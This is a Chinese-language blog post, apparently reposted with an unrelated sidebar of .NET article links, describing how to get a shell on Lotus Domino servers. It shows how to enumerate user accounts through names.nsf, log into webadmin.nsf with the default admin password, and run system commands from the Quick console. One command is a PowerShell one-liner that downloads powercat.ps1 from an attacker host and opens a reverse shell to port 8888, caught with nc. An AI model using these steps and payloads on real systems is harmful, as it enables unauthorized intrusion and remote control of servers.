zoukankan      html  css  js  c++  java
  • Lotus Domino 控制台执行命令getshell

    Lotus Domino简介

    应用程序使用Lotus Domino开发。Lotus Domino是一款基于WEB合作的应用程序架构,集电子邮件、文档数据库、快速应用开发技术以及Web技术为一体的电子邮件与群集平台,运行在Linux/Unix和Microsoft Windows操作系统平台下。

    可通过webadmin.nsf访问控制台进行接口管理。Lotus Domino控制台提供了各种命令用于管理服务器。只要获取管理员权限后,就可以执行各种命令,造成命令执行。

    Lotus Domino指纹信息:

    漏洞利用

    可以访问http://10.168.2.4/names.nsf/$users 获取员工账号信息

    访问控制台http://10.168.2.4/webadmin.nsf 使用管理员账号admin,默认密码password,登陆系统

    选择"Server"-"Status"-"Quick console",执行命令
    命令格式:
    load cmd /c ping c4vm7l.dnslog.cn

    使用powershell 执行powercat反弹shell:
    执行命令,使用powershell远程下载执行powercat.ps1,反弹shell到本机10.82.108.62的8888端口

    load cmd /c powershell IEX (New-Object 
    System.Net.Webclient).DownloadString('http://10.82.108.62/powercat.ps1'); powercat -c 
    10.82.108.62 -p 8888 -e cmd 
    
    

    使用nc监听本地的8888端口,接收shell会话

  • 相关阅读:
    .NETCORE微服务架构--网关篇(Ocelot)
    Hangfire实战--添加DashBoard登录权限
    IIS发布-HTTP谓词限制访问
    基于Dapper的泛型Repository
    .Net Framework JWT验证
    .Net Framework swagger 进阶----头部参数
    .Net Framework下安装api swagger
    ErrorSet
    201907总结
    博客美化
  • 原文地址:https://www.cnblogs.com/supdon/p/13469094.html
Copyright © 2011-2022 走看看